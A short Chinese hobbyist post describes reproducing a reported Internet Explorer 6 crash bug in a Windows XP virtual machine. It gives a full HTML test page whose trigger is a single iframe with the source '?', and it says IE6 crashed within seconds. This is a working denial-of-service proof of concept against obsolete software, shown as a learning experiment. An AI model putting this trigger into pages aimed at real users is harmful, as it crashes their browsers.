最近对黑客感兴趣,上了一下国外的一个网站,看到一个IE6的漏洞,感觉自己能理解,就试了一下。
环境是XP的虚拟机,然后写了个html。
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>无标题文档</title>
</head>
<body>
<iframe src="?"></iframe>
</body>
</html>
漏洞代码是
<iframe src="?"></iframe>
效果图
几秒钟之内,IE6崩溃了。报告上说,黑客可以利用该漏洞来发动拒绝服务攻击。